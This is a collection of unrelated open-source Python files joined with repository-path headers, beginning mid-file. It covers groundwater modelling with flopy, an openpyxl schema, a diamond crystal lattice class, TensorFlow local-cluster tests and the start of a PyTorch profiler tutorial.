    def forward(self, inputs):
        """Return class logits of shape ``(batch, num_labels)``."""
        feature = self.stem(inputs)
        for cell in self.cells:
            feature = cell(feature)
        out = self.lastact(feature)
        out = self.global_pooling(out)
        out = out.view(out.size(0), -1)
        logits = self.classifier(out)
        return logits
|
examples/scripts/flopy_lake_example.py | andrewcalderwood/flopy | 351 | 10400 | import os
import sys
import numpy as np
import matplotlib.pyplot as plt
import flopy
def run():
    """Build and run the MODFLOW-2005 'lake' example, then plot head contours.

    Creates a square, 10-layer model with fixed heads on all lateral
    boundaries and a lowered fixed head at the center of the top layer (the
    'lake').  Contour figures are written into the workspace as PNG, or PDF
    when ``--pdf`` is passed on the command line.

    Returns:
        int: 0 on success.  Requires the ``mf2005`` executable on the PATH.
    """
    workspace = os.path.join("lake")
    # make sure workspace directory exists
    if not os.path.exists(workspace):
        os.makedirs(workspace)
    # Output figure format; '--pdf' anywhere on the command line switches it.
    fext = "png"
    narg = len(sys.argv)
    iarg = 0
    if narg > 1:
        while iarg < narg - 1:
            iarg += 1
            basearg = sys.argv[iarg].lower()
            if basearg == "--pdf":
                fext = "pdf"
    # save the starting path
    cwdpth = os.getcwd()
    # change to the working directory
    os.chdir(workspace)
    # We are creating a square model with a specified head equal to `h1` along all boundaries.
    # The head at the cell in the center in the top layer is fixed to `h2`. First, set the name
    # of the model and the parameters of the model: the number of layers `Nlay`, the number of rows
    # and columns `N`, lengths of the sides of the model `L`, aquifer thickness `H`, hydraulic
    # conductivity `Kh`
    name = "lake_example"
    h1 = 100
    h2 = 90
    Nlay = 10
    N = 101
    L = 400.0
    H = 50.0
    Kh = 1.0
    # Create a MODFLOW model and store it (in this case in the variable `ml`, but you can call it
    # whatever you want). The modelname will be the name given to all MODFLOW files (input and output).
    # The exe_name should be the full path to your MODFLOW executable. The version is either 'mf2k'
    # for MODFLOW2000 or 'mf2005'for MODFLOW2005.
    ml = flopy.modflow.Modflow(
        modelname=name, exe_name="mf2005", version="mf2005"
    )
    # Define the discretization of the model. All layers are given equal thickness. The `bot` array
    # is build from the `Hlay` values to indicate top and bottom of each layer, and `delrow` and
    # `delcol` are computed from model size `L` and number of cells `N`. Once these are all computed,
    # the Discretization file is built.
    bot = np.linspace(-H / Nlay, -H, Nlay)
    delrow = delcol = L / (N - 1)
    dis = flopy.modflow.ModflowDis(
        ml,
        nlay=Nlay,
        nrow=N,
        ncol=N,
        delr=delrow,
        delc=delcol,
        top=0.0,
        botm=bot,
        laycbd=0,
    )
    # Next we specify the boundary conditions and starting heads with the Basic package. The `ibound`
    # array will be `1` in all cells in all layers, except for along the boundary and in the cell at
    # the center in the top layer where it is set to `-1` to indicate fixed heads. The starting heads
    # are used to define the heads in the fixed head cells (this is a steady simulation, so none of
    # the other starting values matter). So we set the starting heads to `h1` everywhere, except for
    # the head at the center of the model in the top layer.
    Nhalf = int((N - 1) / 2)
    ibound = np.ones((Nlay, N, N), dtype=int)
    ibound[:, 0, :] = -1
    ibound[:, -1, :] = -1
    ibound[:, :, 0] = -1
    ibound[:, :, -1] = -1
    ibound[0, Nhalf, Nhalf] = -1
    start = h1 * np.ones((N, N))
    start[Nhalf, Nhalf] = h2
    # create external ibound array and starting head files
    files = []
    hfile = f"{name}_strt.ref"
    np.savetxt(hfile, start)
    hfiles = []
    for kdx in range(Nlay):
        file = f"{name}_ib{kdx + 1:02d}.ref"
        files.append(file)
        # Every layer reuses the same starting-head file written above.
        hfiles.append(hfile)
        np.savetxt(file, ibound[kdx, :, :], fmt="%5d")
    bas = flopy.modflow.ModflowBas(ml, ibound=files, strt=hfiles)
    # The aquifer properties (really only the hydraulic conductivity) are defined with the
    # LPF package.
    lpf = flopy.modflow.ModflowLpf(ml, hk=Kh)
    # Finally, we need to specify the solver we want to use (PCG with default values), and the
    # output control (using the default values). Then we are ready to write all MODFLOW input
    # files and run MODFLOW.
    pcg = flopy.modflow.ModflowPcg(ml)
    oc = flopy.modflow.ModflowOc(ml)
    ml.write_input()
    ml.run_model()
    # change back to the starting directory
    os.chdir(cwdpth)
    # Once the model has terminated normally, we can read the heads file. First, a link to the heads
    # file is created with `HeadFile`. The link can then be accessed with the `get_data` function, by
    # specifying, in this case, the step number and period number for which we want to retrieve data.
    # A three-dimensional array is returned of size `nlay, nrow, ncol`. Matplotlib contouring functions
    # are used to make contours of the layers or a cross-section.
    hds = flopy.utils.HeadFile(os.path.join(workspace, f"{name}.hds"))
    h = hds.get_data(kstpkper=(0, 0))
    x = y = np.linspace(0, L, N)
    # Figure 1: head contours in the top layer.
    c = plt.contour(x, y, h[0], np.arange(90, 100.1, 0.2))
    plt.clabel(c, fmt="%2.1f")
    plt.axis("scaled")
    outfig = os.path.join(workspace, f"lake1.{fext}")
    fig = plt.gcf()
    fig.savefig(outfig, dpi=300)
    print("created...", outfig)
    # Figure 2: head contours in the bottom layer.
    x = y = np.linspace(0, L, N)
    c = plt.contour(x, y, h[-1], np.arange(90, 100.1, 0.2))
    plt.clabel(c, fmt="%1.1f")
    plt.axis("scaled")
    outfig = os.path.join(workspace, f"lake2.{fext}")
    fig = plt.gcf()
    fig.savefig(outfig, dpi=300)
    print("created...", outfig)
    # Figure 3: vertical cross-section through the middle row.
    z = np.linspace(-H / Nlay / 2, -H + H / Nlay / 2, Nlay)
    c = plt.contour(x, z, h[:, 50, :], np.arange(90, 100.1, 0.2))
    plt.axis("scaled")
    outfig = os.path.join(workspace, f"lake3.{fext}")
    fig = plt.gcf()
    fig.savefig(outfig, dpi=300)
    print("created...", outfig)
    return 0
if __name__ == "__main__":
    # run() returns 0 on success; the value is kept but not used as exit code.
    success = run()
|
changes/api/build_coverage.py | vault-the/changes | 443 | 10473 | <reponame>vault-the/changes
from changes.api.base import APIView
from changes.lib.coverage import get_coverage_by_build_id, merged_coverage_data
from changes.models.build import Build
class BuildTestCoverageAPIView(APIView):
    """API endpoint returning merged file-coverage data for a single build."""

    def get(self, build_id):
        """Respond with merged coverage for ``build_id``; 404 when unknown."""
        build = Build.query.get(build_id)
        if build is None:
            return '', 404
        merged = merged_coverage_data(get_coverage_by_build_id(build.id))
        return self.respond(merged)
|
venv/Lib/site-packages/openpyxl/worksheet/errors.py | ajayiagbebaku/NFL-Model | 5,079 | 10480 | <gh_stars>1000+
#Autogenerated schema
from openpyxl.descriptors.serialisable import Serialisable
from openpyxl.descriptors import (
Typed,
String,
Bool,
Sequence,
)
from openpyxl.descriptors.excel import CellRange
class Extension(Serialisable):
    """A generic OOXML ``<extension>`` element identified by a URI."""

    tagname = "extension"

    # Identifier of the extension's schema; optional.
    uri = String(allow_none=True)

    def __init__(self,
                 uri=None,
                ):
        self.uri = uri
class ExtensionList(Serialisable):
    """Container for a sequence of :class:`Extension` elements."""

    tagname = "extensionList"

    # uses element group EG_ExtensionList
    ext = Sequence(expected_type=Extension)

    __elements__ = ('ext',)

    def __init__(self,
                 ext=(),
                ):
        self.ext = ext
class IgnoredError(Serialisable):
    """Worksheet error checks to suppress for the cell range ``sqref``.

    Each boolean flag corresponds to one class of warning that a spreadsheet
    application would otherwise flag for the affected cells.
    """

    tagname = "ignoredError"

    # Range of cells the suppressions apply to.
    sqref = CellRange
    evalError = Bool(allow_none=True)
    twoDigitTextYear = Bool(allow_none=True)
    numberStoredAsText = Bool(allow_none=True)
    formula = Bool(allow_none=True)
    formulaRange = Bool(allow_none=True)
    unlockedFormula = Bool(allow_none=True)
    emptyCellReference = Bool(allow_none=True)
    listDataValidation = Bool(allow_none=True)
    calculatedColumn = Bool(allow_none=True)

    def __init__(self,
                 sqref=None,
                 evalError=False,
                 twoDigitTextYear=False,
                 numberStoredAsText=False,
                 formula=False,
                 formulaRange=False,
                 unlockedFormula=False,
                 emptyCellReference=False,
                 listDataValidation=False,
                 calculatedColumn=False,
                ):
        self.sqref = sqref
        self.evalError = evalError
        self.twoDigitTextYear = twoDigitTextYear
        self.numberStoredAsText = numberStoredAsText
        self.formula = formula
        self.formulaRange = formulaRange
        self.unlockedFormula = unlockedFormula
        self.emptyCellReference = emptyCellReference
        self.listDataValidation = listDataValidation
        self.calculatedColumn = calculatedColumn
class IgnoredErrors(Serialisable):
    """Collection of :class:`IgnoredError` entries for a worksheet."""

    tagname = "ignoredErrors"

    ignoredError = Sequence(expected_type=IgnoredError)
    extLst = Typed(expected_type=ExtensionList, allow_none=True)

    __elements__ = ('ignoredError', 'extLst')

    def __init__(self,
                 ignoredError=(),
                 extLst=None,
                ):
        self.ignoredError = ignoredError
        self.extLst = extLst
|
idaes/apps/matopt/materials/lattices/diamond_lattice.py | carldlaird/idaes-pse | 112 | 10489 | #################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
from copy import deepcopy
from math import sqrt
import numpy as np
from .unit_cell_lattice import UnitCell, UnitCellLattice
from ..geometry import Cube
from ..tiling import CubicTiling
from ..transform_func import ScaleFunc, RotateFunc
from ...util.util import ListHasPoint
class DiamondLattice(UnitCellLattice):
    """Diamond cubic lattice built from a reference unit cell of edge length 1.

    ``IAD`` is the inter-atomic (nearest-neighbor) distance; in the reference
    cell it equals ``sqrt(3) / 4``.
    """

    RefIAD = sqrt(3) / 4

    # === STANDARD CONSTRUCTOR
    def __init__(self, IAD):
        """Construct a diamond lattice scaled to inter-atomic distance ``IAD``."""
        RefUnitCellShape = Cube(1, BotBackLeftCorner=np.array([0, 0, 0], dtype=float))
        RefUnitCellTiling = CubicTiling(RefUnitCellShape)
        # Eight atoms of the conventional diamond cell, fractional coordinates.
        RefFracPositions = [np.array([0.0, 0.0, 0.0]),
                            np.array([0.5, 0.5, 0.0]),
                            np.array([0.0, 0.5, 0.5]),
                            np.array([0.5, 0.0, 0.5]),
                            np.array([0.25, 0.25, 0.25]),
                            np.array([0.25, 0.75, 0.75]),
                            np.array([0.75, 0.25, 0.75]),
                            np.array([0.75, 0.75, 0.25])]
        RefUnitCell = UnitCell(RefUnitCellTiling, RefFracPositions)
        UnitCellLattice.__init__(self, RefUnitCell)
        self._IAD = DiamondLattice.RefIAD  # IAD is set correctly after calling applyTransF
        self.applyTransF(ScaleFunc(IAD / DiamondLattice.RefIAD))
        # First- and second-shell neighbor offsets for the two site types
        # (index 0: A sites, index 1: B sites), in reference coordinates.
        self._NthNeighbors = [[[np.array([0.25, 0.25, 0.25]),
                                np.array([-0.25, -0.25, 0.25]),
                                np.array([-0.25, 0.25, -0.25]),
                                np.array([0.25, -0.25, -0.25])],
                               [np.array([-0.25, -0.25, -0.25]),
                                np.array([0.25, 0.25, -0.25]),
                                np.array([0.25, -0.25, 0.25]),
                                np.array([-0.25, 0.25, 0.25])]],
                              [[np.array([0.0, 0.5, 0.5]),
                                np.array([0.0, 0.5, -0.5]),
                                np.array([0.0, -0.5, 0.5]),
                                np.array([0.0, -0.5, -0.5]),
                                np.array([0.5, 0.5, 0.0]),
                                np.array([0.5, 0.0, 0.5]),
                                np.array([0.5, -0.5, 0.0]),
                                np.array([0.5, 0.0, -0.5]),
                                np.array([-0.5, 0.5, 0.0]),
                                np.array([-0.5, 0.0, 0.5]),
                                np.array([-0.5, -0.5, 0.0]),
                                np.array([-0.5, 0.0, -0.5])],
                               [np.array([0.0, 0.5, 0.5]),
                                np.array([0.0, 0.5, -0.5]),
                                np.array([0.0, -0.5, 0.5]),
                                np.array([0.0, -0.5, -0.5]),
                                np.array([0.5, 0.5, 0.0]),
                                np.array([0.5, 0.0, 0.5]),
                                np.array([0.5, -0.5, 0.0]),
                                np.array([0.5, 0.0, -0.5]),
                                np.array([-0.5, 0.5, 0.0]),
                                np.array([-0.5, 0.0, 0.5]),
                                np.array([-0.5, -0.5, 0.0]),
                                np.array([-0.5, 0.0, -0.5])]]]
        # Maps the point-type value (see _getPointType) to a neighbor-list index.
        self._typeDict = {0: 0, 3: 1}
        self._relativePositions = {0: np.array([0.0, 0.0, 0.0]), 3: np.array([0.25, 0.25, 0.25])}

    # === CONSTRUCTOR - Aligned with {100}
    @classmethod
    def alignedWith100(cls, IAD):
        return cls(IAD)  # Default implementation

    # === CONSTRUCTOR - Aligned with {110}
    @classmethod
    def aligndWith110(cls, IAD):
        result = cls(IAD)
        thetaX = 0
        thetaY = np.pi * 0.25
        thetaZ = 0
        result.applyTransF(RotateFunc.fromXYZAngles(thetaX, thetaY, thetaZ))
        return result

    # Correctly-spelled alias kept alongside the original (typo) name for
    # backward compatibility.
    alignedWith110 = aligndWith110

    # === CONSTRUCTOR - Aligned with {111}
    @classmethod
    def alignedWith111(cls, IAD, blnTrianglesAlignedWithX=True):
        result = cls(IAD)
        thetaX = -np.pi * 0.25
        thetaY = -np.arctan2(-sqrt(2), 2)
        thetaZ = (np.pi * 0.5 if blnTrianglesAlignedWithX else 0)
        result.applyTransF(RotateFunc.fromXYZAngles(thetaX, thetaY, thetaZ))
        return result

    # === CONSTRUCTOR - Aligned with {xyz}
    @classmethod
    def alignedWith(cls, IAD, MI):
        """Build a lattice aligned with Miller-index string ``MI`` (e.g. '111').

        Raises:
            ValueError: if ``MI`` is not a three-digit string.
        """
        if (type(MI) is str) and (len(MI) == 3) and all(x.isdigit() for x in MI):
            if MI in ['100', '010', '001']:
                return cls(IAD)
            elif MI in ['110', '101', '011']:
                return cls.aligndWith110(IAD)
            elif MI == '111':
                return cls.alignedWith111(IAD)
            else:
                result = cls(IAD)
                a = np.array([0.0, 0.0, 1.0])
                b = np.array([float(MI[0]), float(MI[1]), float(MI[2])])
                axis = np.cross(a, b)
                angle = np.arccos(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))
                result.applyTransF(RotateFunc.fromAxisAngle(axis, angle))
                return result
        # BUGFIX: previously this *returned* a ValueError instance instead of
        # raising it, silently handing callers an exception object.
        raise ValueError('DiamondLattice.alignedWith: Input direction is not correct.')

    # === MANIPULATION METHODS
    def applyTransF(self, TransF):
        """Apply a transform; only isometric scaling may change the stored IAD."""
        if isinstance(TransF, ScaleFunc):
            if TransF.isIsometric:
                self._IAD *= TransF.Scale[0]
            else:
                raise ValueError('DiamondLattice.applyTransF: Can only scale isometrically')
        UnitCellLattice.applyTransF(self, TransF)

    # === AUXILIARY METHODS
    def _getPointType(self, P):
        """Classify a reference-space point: 0 for A sites, 3 for B sites."""
        return (int(round(P[0] * 4)) + int(round(P[1] * 4)) + int(round(P[2] * 4))) % 4

    # === PROPERTY EVALUATION METHODS
    # NOTE: inherited from UnitCellLattice
    # def isOnLattice(self,P):

    def areNeighbors(self, P1, P2):
        """Return True when the two points are within one IAD of each other."""
        return np.linalg.norm(P2 - P1) <= self.IAD

    def getNeighbors(self, P, layer=1):
        """Return the ``layer``-th neighbor shell of point ``P`` (lattice coords)."""
        RefP = self._getConvertToReference(P)
        PType = self._getPointType(RefP)
        if PType not in self._typeDict:
            raise ValueError('DiamondLattice.getNeighbors Should never reach here!')
        if layer > len(self._NthNeighbors):
            # Lazily extend the cached neighbor shells up to the requested layer.
            self._calculateNeighbors(layer)
        NBs = deepcopy(self._NthNeighbors[layer - 1][self._typeDict[PType]])
        for NeighP in NBs:
            NeighP += RefP
            self._convertFromReference(NeighP)
        return NBs

    def _calculateNeighbors(self, layer):
        """Extend ``self._NthNeighbors`` so at least ``layer`` shells are cached."""
        # NList accumulates, per site type, every offset already assigned to a
        # shell (plus the origin) so new shells exclude previously seen points.
        NList = []
        for k, v in self._typeDict.items():
            tmp = [np.array([0, 0, 0], dtype=float)]
            for nb in self._NthNeighbors:
                tmp.extend(nb[v])
            NList.append(tmp)
        for _ in range(layer - len(self._NthNeighbors)):
            tmp = [[] for _ in self._typeDict.keys()]
            for k, v in self._typeDict.items():
                for P in self._NthNeighbors[len(self._NthNeighbors) - 1][v]:
                    PType = self._getPointType(P + self._relativePositions[k])
                    for Q in self._NthNeighbors[0][self._typeDict[PType]]:
                        N = P + Q
                        if not ListHasPoint(NList[v], N, 0.001 * DiamondLattice.RefIAD):
                            tmp[v].append(N)
                            NList[v].append(N)
            self._NthNeighbors.append(tmp)

    def isASite(self, P):
        """Return True when ``P`` lies on an A sublattice site."""
        RefP = self._getConvertToReference(P)
        PType = self._getPointType(RefP)
        return PType == 0

    def isBSite(self, P):
        """Return True when ``P`` lies on a B sublattice site."""
        RefP = self._getConvertToReference(P)
        PType = self._getPointType(RefP)
        return PType == 3

    def setDesign(self, D, AType, BType):
        """Assign ``AType``/``BType`` contents to the A/B sites of design ``D``."""
        for i, P in enumerate(D.Canvas.Points):
            if self.isASite(P):
                D.setContent(i, AType)
            elif self.isBSite(P):
                D.setContent(i, BType)
            else:
                raise ValueError('setDesign can not set site not on lattice')

    # === BASIC QUERY METHODS
    @property
    def IAD(self):
        """Inter-atomic (nearest-neighbor) distance."""
        return self._IAD

    @property
    def Diamond100LayerSpacing(self):
        return self.IAD / sqrt(3)

    @property
    def Diamond110LayerSpacing(self):
        return self.IAD * sqrt(2) / sqrt(3)

    @property
    def Diamond111LayerSpacing(self):
        return self.IAD * 4 / 3

    @property
    def Diamond112LayerSpacing(self):
        return self.IAD * sqrt(2) / 3

    def getLayerSpacing(self, MI):
        """Return the inter-layer spacing along Miller direction ``MI``.

        Raises:
            NotImplementedError: for a valid but unsupported direction.
            ValueError: if ``MI`` is not a three-digit string.
        """
        if (type(MI) is str) and (len(MI) == 3) and all(x.isdigit() for x in MI):
            if MI in ['100', '010', '001']:
                return self.Diamond100LayerSpacing
            elif MI in ['110', '101', '011']:
                return self.Diamond110LayerSpacing
            elif MI == '111':
                return self.Diamond111LayerSpacing
            elif MI in ['112', '121', '211']:
                return self.Diamond112LayerSpacing
            else:
                raise NotImplementedError('DiamondLattice.getLayerSpacing: Input direction is not supported.')
        # BUGFIX: was ``return ValueError(...)``.
        raise ValueError('DiamondLattice.getLayerSpacing: Input direction is not correct.')

    def getShellSpacing(self, MI):
        """Return the shell spacing along Miller direction ``MI``."""
        if (type(MI) is str) and (len(MI) == 3) and all(x.isdigit() for x in MI):
            if MI in ['100', '010', '001', '110', '101', '011', '111']:
                return self.IAD * sqrt(8) / sqrt(3)
            elif MI in ['112', '121', '211']:
                return self.IAD * sqrt(2) / sqrt(3)
            else:
                raise NotImplementedError('DiamondLattice.getShellSpacing: Input direction is not supported.')
        # BUGFIX: was ``return ValueError(...)``.
        raise ValueError('The input direction is not correct.')

    def getUniqueLayerCount(self, MI):
        """Return the number of distinct layers repeated along direction ``MI``."""
        if (type(MI) is str) and (len(MI) == 3) and all(x.isdigit() for x in MI):
            if MI in ['100', '010', '001']:
                return 4
            elif MI in ['110', '101', '011']:
                return 2
            elif MI == '111':
                return 3
            elif MI in ['112', '121', '211']:
                return 6
            else:
                raise NotImplementedError('DiamondLattice.getUniqueLayerCount: Input direction is not supported.')
        # BUGFIX: was ``return ValueError(...)``.
        raise ValueError('The input direction is not correct.')
|
test/tc/tet_tc_base_predict_multiclass.py | dumpmemory/Pytorch-NLU | 115 | 10501 | # !/usr/bin/python
# -*- coding: utf-8 -*-
# @time : 2021/7/25 19:30
# @author : Mo
# @function: predict model, multi-class classification prediction module
# adapted for Linux
import platform
import json
import sys
import os
# Resolve the project root and the textclassification package directory so the
# script can locate the package when run from this test folder.
path_root = os.path.abspath(os.path.join(os.path.dirname(__file__), "../.."))
path_sys = os.path.join(path_root, "pytorch_nlu", "pytorch_textclassification")  # NOTE(review): computed but never inserted into sys.path here — confirm it is needed.
print(path_root)
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
from tcPredict import TextClassificationPredict
if __name__ == "__main__":
    # Path to the trained model's saved configuration.
    path_config = "../output/text_classification/model_ERNIE/tc.config"
    tcp = TextClassificationPredict(path_config)
    # Smoke-test documents (Chinese text about Pingle County, Guangxi).
    texts = [{"text": "平乐县,古称昭州,隶属于广西壮族自治区桂林市,位于广西东北部,桂林市东南部,东临钟山县,南接昭平,西北毗邻阳朔,北连恭城,总面积1919.34平方公里。"},
             {"text": "平乐县主要旅游景点有榕津千年古榕、冷水石景苑、仙家温泉、桂江风景区、漓江风景区等,平乐县为漓江分界点,平乐以北称漓江,以南称桂江,是著名的大桂林旅游区之一。"},
             {"text": "印岭玲珑,昭水晶莹,环绕我平中。青年的乐园,多士受陶熔。生活自觉自治,学习自发自动。五育并重,手脑并用。迎接新潮流,建设新平中"},
             {"text": "桂林山水甲天下, 阳朔山水甲桂林"},
             ]
    res = tcp.predict(texts, logits_type="sigmoid")
    print(res)
    # Interactive loop: classify user input until the process is terminated.
    while True:
        print("请输入:")
        question = input()
        res = tcp.predict([{"text": question}], logits_type="sigmoid")
        print(res)
|
tensorflow/python/training/localhost_cluster_performance_test.py | connectthefuture/tensorflow | 101 | 10512 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests and benchmarks for creating RPC clusters on localhost."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import portpicker
import tensorflow as tf
def create_local_cluster(num_workers, num_ps, protocol="grpc"):
  """Start in-process GRPC servers for a local test cluster.

  Args:
    num_workers: Number of worker tasks to start.
    num_ps: Number of parameter-server tasks to start.
    protocol: RPC protocol passed to `tf.train.Server`.

  Returns:
    A tuple `(workers, ps_servers)` of started `tf.train.Server` objects.
  """
  cluster_dict = {
      "worker": ["localhost:%s" % portpicker.pick_unused_port()
                 for _ in range(num_workers)],
      "ps": ["localhost:%s" % portpicker.pick_unused_port()
             for _ in range(num_ps)],
  }
  cluster_spec = tf.train.ClusterSpec(cluster_dict)
  workers = []
  for task_index in range(num_workers):
    workers.append(
        tf.train.Server(cluster_spec, job_name="worker", protocol=protocol,
                        task_index=task_index, start=True))
  ps_servers = []
  for task_index in range(num_ps):
    ps_servers.append(
        tf.train.Server(cluster_spec, job_name="ps", protocol=protocol,
                        task_index=task_index, start=True))
  return workers, ps_servers
class CreateLocalClusterTest(tf.test.TestCase):
  """Sanity check that variables on ps tasks are visible across workers."""

  def testCreateLocalCluster(self):
    # Two workers, two parameter servers; variables are pinned to the ps
    # tasks and initialized from one worker session each.
    workers, _ = create_local_cluster(num_workers=2, num_ps=2)
    worker_sessions = [tf.Session(w.target) for w in workers]
    with tf.device("/job:ps/task:0"):
      var0 = tf.Variable(0.0)
    with tf.device("/job:ps/task:1"):
      var1 = tf.Variable(1.0)
    worker_sessions[0].run([var0.initializer, var1.initializer])
    with tf.device("/job:ps/task:0"):
      var2 = tf.Variable(2.0)
    with tf.device("/job:ps/task:1"):
      var3 = tf.Variable(3.0)
    worker_sessions[1].run([var2.initializer, var3.initializer])
    # Read values back in the opposite session
    self.assertAllEqual(0.0, var0.eval(session=worker_sessions[1]))
    self.assertAllEqual(1.0, var1.eval(session=worker_sessions[1]))
    self.assertAllEqual(2.0, var2.eval(session=worker_sessions[0]))
    self.assertAllEqual(3.0, var3.eval(session=worker_sessions[0]))
class CreateLocalClusterBenchmark(tf.test.Benchmark):
  """Benchmarks cluster-creation latency for 1 worker and 10 ps tasks."""

  def benchmarkCreateLocalCluster(self):
    iters = 5
    deltas = []
    for _ in range(iters):
      begin = time.time()
      create_local_cluster(num_workers=1, num_ps=10)
      deltas.append(time.time() - begin)
    median_delta = np.median(deltas)
    print(
        "\n\nbenchmark_create_local_cluster_1_worker_10_ps. "
        "iterations: %d, median wall time: %g\n\n" % (iters, median_delta))
    self.report_benchmark(
        iters=iters,
        wall_time=median_delta,
        name="benchmark_create_local_cluster_1_worker_10_ps")
class PartitionedVariablesBenchmark(tf.test.Benchmark):
  """Benchmarks reading a 1000-way partitioned variable from 100 ps tasks."""

  def benchmark_create_1000_partitions_with_100_parameter_servers(self):
    workers, _ = create_local_cluster(num_workers=1, num_ps=100)
    worker_sessions = [tf.Session(w.target) for w in workers]
    worker = worker_sessions[0]
    partition_sizes = (1, 512, 1024*32, 1024*128)
    partitioned = []
    for partition_size in partition_sizes:
      # max_shard_bytes is 4, shape is 1000*partition_size float32s which should
      # partition into 1000 shards, each containing partition_size float32s.
      print("Building partitioned variable with %d floats per partition"
            % partition_size)
      with tf.device(tf.train.replica_device_setter(ps_tasks=100)):
        partitioned_ix = tf.get_variable(
            "partitioned_%d" % partition_size,
            shape=[1000 * partition_size],
            dtype=tf.float32,
            # Each partition to have exactly N float32s
            partitioner=tf.variable_axis_size_partitioner(
                max_shard_bytes=4 * partition_size))
        # Concatenates along axis 0
        partitioned.append(tf.convert_to_tensor(partitioned_ix))
    tf.global_variables_initializer().run(session=worker)
    for ix, partition_size in enumerate(partition_sizes):
      print("Running benchmark having partitions with %d floats"
            % partition_size)
      self.run_op_benchmark(
          worker,
          partitioned[ix],
          name=("read_concat_1000_partitions_from_"
                "100_parameter_servers_partsize_%d_floats" % partition_size))
if __name__ == "__main__":
  # Runs the unit tests (and the benchmarks when --benchmarks is passed).
  tf.test.main()
|
bell2014/energy/prob_abs_s.py | dmaugis/intrinsic | 134 | 10525 | <gh_stars>100-1000
import numpy as np
class ProbAbsoluteShading(object):
    """Absolute-shading prior: penalizes deviation from a gray-point value.

    ``params`` supplies ``abs_shading_weight`` (penalty scale; falsy disables
    the prior), ``abs_shading_log`` (compare in log space when true) and
    ``abs_shading_gray_point`` (the target shading value).
    """

    def __init__(self, params):
        self.params = params

    def cost(self, s_nz):
        """Return the per-element cost for shading values ``s_nz``, or 0 if disabled."""
        p = self.params
        if not p.abs_shading_weight:
            # Zero/absent weight disables the prior entirely.
            return 0
        target = p.abs_shading_gray_point
        if p.abs_shading_log:
            deviation = np.abs(np.log(s_nz) - np.log(target))
        else:
            deviation = np.abs(s_nz - target)
        return p.abs_shading_weight * deviation
|
code/ch_02_foundations/_02_noneness.py | SuppMonkey/write.pythonic.code | 679 | 10534 | <filename>code/ch_02_foundations/_02_noneness.py<gh_stars>100-1000
def find_accounts(search_text):
    """Search the database; return matching account IDs, or None when the DB is down."""
    # perform search...
    if not db_is_available:
        return None
    # returns a list of account IDs
    return db_search(search_text)


def db_search(search_text):
    """Stub search: pretend these account IDs match any query."""
    return [1, 11]


# Module state consulted by find_accounts.
# BUGFIX: this was misspelled ``db_is_availble`` and assigned only *after* the
# module-level call below, so find_accounts raised NameError at call time.
db_is_available = True

accounts = find_accounts('python')
if accounts is None:
    print("Error: DB not available")
else:
    print("Accounts found: Would list them here...")
|
docs/_downloads/dbc5873471dad3c21022112121cbd008/tensorboard_profiler_tutorial.py | woojinsong/PyTorch-tutorials-kr | 221 | 10557 | """
PyTorch Profiler With TensorBoard
====================================
This tutorial demonstrates how to use TensorBoard plugin with PyTorch Profiler
to detect performance bottlenecks of the model.
Introduction
------------
PyTorch 1.8 includes an updated profiler API capable of
recording the CPU side operations as well as the CUDA kernel launches on the GPU side.
The profiler can visualize this information
in TensorBoard Plugin and provide analysis of the performance bottlenecks.
In this tutorial, we will use a simple Resnet model to demonstrate how to
use TensorBoard plugin to analyze model performance.
Setup
-----
To install ``torch`` and ``torchvision`` use the following command:
::
pip install torch torchvision
"""
######################################################################
# Steps
# -----
#
# 1. Prepare the data and model
# 2. Use profiler to record execution events
# 3. Run the profiler
# 4. Use TensorBoard to view results and analyze model performance
# 5. Improve performance with the help of profiler
# 6. Analyze performance with other advanced features
#
# 1. Prepare the data and model
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# First, import all necessary libraries:
#
import torch
import torch.nn
import torch.optim
import torch.profiler
import torch.utils.data
import torchvision.datasets
import torchvision.models
import torchvision.transforms as T
######################################################################
# Then prepare the input data. For this tutorial, we use the CIFAR10 dataset.
# Transform it to the desired format and use DataLoader to load each batch.
# CIFAR10 images are 32x32; resize to 224x224 to match the input size the
# pretrained ResNet-18 expects, and map pixel values into [-1, 1].
transform = T.Compose(
    [T.Resize(224),
     T.ToTensor(),
     T.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
# download=True fetches the dataset into ./data on first run.
train_set = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)
train_loader = torch.utils.data.DataLoader(train_set, batch_size=32, shuffle=True)
######################################################################
# Next, create Resnet model, loss function, and optimizer objects.
# To run on GPU, move model and loss to GPU device.
device = torch.device("cuda:0")
model = torchvision.models.resnet18(pretrained=True).cuda(device)
criterion = torch.nn.CrossEntropyLoss().cuda(device)
optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9)
# Put the model in training mode (affects layers such as batch-norm/dropout).
model.train()
######################################################################
# Define the training step for each batch of input data.
def train(data):
    """Run one optimization step on a single ``(images, labels)`` batch.

    Uses the module-level ``model``, ``criterion``, ``optimizer`` and
    ``device`` objects defined above.
    """
    batch_inputs = data[0].to(device=device)
    batch_labels = data[1].to(device=device)
    optimizer.zero_grad()
    predictions = model(batch_inputs)
    loss = criterion(predictions, batch_labels)
    loss.backward()
    optimizer.step()
######################################################################
# 2. Use profiler to record execution events
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# The profiler is enabled through the context manager and accepts several parameters,
# some of the most useful are:
#
